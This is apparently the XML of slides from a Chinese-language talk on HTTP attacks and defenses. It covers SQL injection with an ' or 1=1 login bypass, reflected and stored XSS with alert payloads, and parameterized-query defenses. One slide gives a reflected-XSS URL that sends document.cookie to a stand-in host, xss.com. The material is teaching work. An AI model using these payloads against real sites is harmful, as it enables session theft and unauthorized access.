              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入过程分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{253C5329-D11A-401F-8B5C-C4C5E7596432}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>我们将上面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>做一下修改，在参数后面加一个单引号。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>http://www.baidu.com?id=123'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>        http://www.baidu.com?name=ixianlai'</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="392969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B4C94-DEA6-4673-84BD-719090D09862}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入过程分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A07184E-BA49-4FA7-A309-87D6153612DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>相应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>语句变为了：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>select * from blog where id=123';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>        select * from blog where name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>ixianlai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>'';</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="208564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9ED66-6647-4DDD-8346-B4940A08F7C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FDA42F7-EA33-4356-B20B-49A20605DBBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="3103418"/>
            <a:ext cx="10058400" cy="2765676"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
              <a:t>第三次分享</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
              <a:t>协议的攻击，分析与防护</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12436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1686A-1EB1-4097-ADFB-4493D6EB5111}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一个例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{415F9504-8461-4483-B06B-177439F665A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t> http://www.ixianlai.com?username=root&amp;password=123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>对应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>语句为：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>select * from account where username='root' and password='123’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t> http://www.ixianlai.com?username=root&amp;password=' or 1=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>对应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>语句变为了：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>select * from account where username='root' and password='' or 1=1;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="402125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6A3EF-2AF0-45FE-A525-D13B2DC3F889}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入的防范</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68446009-96BB-46A5-A9B7-1526F08D3E17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>构造动态</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>时，要使用数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>提供的类型安全的机制。大多数的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>都提供了这样的机制。这样的机制可以保证参数被正确编码，而不是当作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>语句来执行。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>中的相关机制</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>不要将敏感数据以明文的形式保存在数据库中。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>使用低权限用户运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>程序。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4256771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9E6B2-14CC-496A-8543-7FAA1D112D64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB23EC66-1085-4B35-ACF5-4B987C4C1F2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>恶意攻击者往</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>页面里插入恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>Java Script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>代码，当用户浏览该页之时，嵌入其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>里面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>Java Script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>代码会被执行，从而达到恶意攻击用户的目的。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="931244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EDC5F-D653-4A76-93C4-48035BDDB967}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>基于反射的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="http://s4.51cto.com/wyfs02/M01/08/D0/wKiom1nnWhCS-ibvAACN4UQ6Qjg077.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FBD8B66-4652-4051-BA4E-213A53C164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639" y="2067149"/>
            <a:ext cx="7619047" cy="358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035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B55B7-5530-4527-A466-64941FEC9B77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>促发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="http://s4.51cto.com/wyfs02/M00/08/D0/wKiom1nnWhrRHqBCAABlYWd2xGM273.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CC08D40-BF09-4EE2-86BA-9711C9C89F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5574" y="3027218"/>
            <a:ext cx="7619047" cy="237460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F6FA229A-0776-483A-9C2D-C42E33A8FF97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097279" y="2080599"/>
            <a:ext cx="9958647" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在搜索框搜索内容，填入“&lt;script&gt;alert(‘xss’)&lt;/script&gt;”, 点击搜索。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2455738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206F0-EA90-49C9-A5B4-77EDD43E30C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>盗取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32AFBD7D-9F63-4301-BB4A-BF088300E57F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0"/>
              <a:t>http://you.163.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" err="1"/>
              <a:t>search?keyword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0"/>
              <a:t>=&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" err="1"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0"/>
              <a:t>=‘http://xss.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" err="1"/>
              <a:t>get?cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0"/>
              <a:t>=’+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1772123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EBF2E-98BC-4887-AE38-931863516457}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>基于存储的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C03D012A-A17E-465D-97CE-62541E05BE25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>发一篇文章，里面包含了恶意脚本</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>        你好</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>当你看到这段文字时，你的信息已经不安全了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>!&lt;script&gt;alert(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>’)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>后端没有对文章进行过滤，直接保存文章内容到数据库。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>当其他读者看这篇文章的时候，包含的恶意脚本就会执行。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="129611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87207-7DA7-4BEB-BE57-4B24BB2303DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议关键协议头</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——User-Agent</a:t>
